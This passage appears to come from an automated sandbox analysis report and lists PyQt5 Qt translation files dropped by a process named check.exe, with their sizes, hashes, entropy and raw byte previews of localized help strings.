SSDEEP:	192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
MD5:	D520C7F85CC06C66715A2B6622BF0687
SHA1:	47292D068172FBC9DC0D9BE2F479E890A37CE138
SHA-256:	687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
SHA-512:	736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_gl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10891
Entropy (8bit):	4.5087667371046205
Encrypted:	false
SSDEEP:	192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
MD5:	B62C74793741FC386332A59113E8D412
SHA1:	589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
SHA-256:	7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
SHA-512:	D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10284
Entropy (8bit):	4.674501432335502
Encrypted:	false
SSDEEP:	192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
MD5:	5A56E9E2ED6ECE3F249D1C2A7EB3B172
SHA1:	D6F079F40FBB813B0293C1D2210BAE7084092FEC
SHA-256:	70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
SHA-512:	28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10612
Entropy (8bit):	4.458970627057882
Encrypted:	false
SSDEEP:	192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
MD5:	3639B57B463987F6DB07629253ACD8BF
SHA1:	65935A67C73F19FCF6023FB95030A5ACAF9DA21C
SHA-256:	316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
SHA-512:	AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7917
Entropy (8bit):	5.680408580146589
Encrypted:	false
SSDEEP:	192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
MD5:	1380A9352C476071BDA5A5D4FED0B6C5
SHA1:	9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
SHA-256:	AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
SHA-512:	EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....\|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	5708
Entropy (8bit):	5.698914195742074
Encrypted:	false
SSDEEP:	96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
MD5:	CD15674A652C2BF435F7578E119182F8
SHA1:	AEA22E4A0D21396733802C7AB738DDD03737B7D6
SHA-256:	F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
SHA-512:	88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....\|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...\|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...\|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...\|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9673
Entropy (8bit):	4.622652249027856
Encrypted:	false
SSDEEP:	192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
MD5:	2B68446B69D9AA40B273D75A581D2992
SHA1:	8A09BD38998543B74E2673478EDD54FB4BBDD068
SHA-256:	CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
SHA-512:	F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.\|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.\|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	7288
Entropy (8bit):	5.297177914619657
Encrypted:	false
SSDEEP:	192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
MD5:	794AF445A5D7082D51BD22683449F86D
SHA1:	3A0C369872B112A1572AA17EEB814B168B225D98
SHA-256:	557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
SHA-512:	D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	4.70568613551943
Encrypted:	false
SSDEEP:	192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
MD5:	75C94E59F1FC5312AE25381C247AF992
SHA1:	E3E5F4582CC5FAFE6DF43644D11484861023C084
SHA-256:	F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
SHA-512:	959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	10363
Entropy (8bit):	4.613473842638716
Encrypted:	false
SSDEEP:	192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
MD5:	3B0AEE27B193A8A563C5CB5C7C4FE60F
SHA1:	C94E832595EC765370553468F87C02DB7E7D138A
SHA-256:	2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
SHA-512:	EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	4629
Entropy (8bit):	4.68793836539357
Encrypted:	false
SSDEEP:	96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
MD5:	32D6EE3D8EE6408A03E568B972F93BCB
SHA1:	582EE079DBD42000C378E0701D26405750524DBA
SHA-256:	EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
SHA-512:	24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9750
Entropy (8bit):	5.281035122342072
Encrypted:	false
SSDEEP:	192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
MD5:	90A776917D534B65942063C319573CDC
SHA1:	5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
SHA-256:	497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
SHA-512:	B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	6441
Entropy (8bit):	5.790303416386852
Encrypted:	false
SSDEEP:	192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
MD5:	9297A6905B8B1823BF7E318D9138A104
SHA1:	3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
SHA-256:	C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
SHA-512:	01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_help_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	9301
Entropy (8bit):	5.80411750798786
Encrypted:	false
SSDEEP:	192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
MD5:	47C3328D3918CF627112BB6C50E30B86
SHA1:	05705603AB3F28402A6C103E1C41DDFF21D140C0
SHA-256:	3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
SHA-512:	8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.6255640074603277
Encrypted:	false
SSDEEP:	3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
MD5:	5A46979B45C67DD6312F33CCEA2ED7BC
SHA1:	4C56836B1FB10D9903B299CBCB925947D515B4C8
SHA-256:	BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
SHA-512:	BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.5752972123113778
Encrypted:	false
SSDEEP:	3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
MD5:	2BB8C94D420D3BC344C79A01043BDC89
SHA1:	3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
SHA-256:	9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
SHA-512:	C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\translations\qt_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.599979504080125
Encrypted:	false
SSDEEP:	3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
MD5:	8A1EE3433304838CCD0EBE0A825E84D8
SHA1:	2B3476588350C5384E0F9A51FF2E3659E89B4846
SHA-256:	23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
SHA-512:	2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

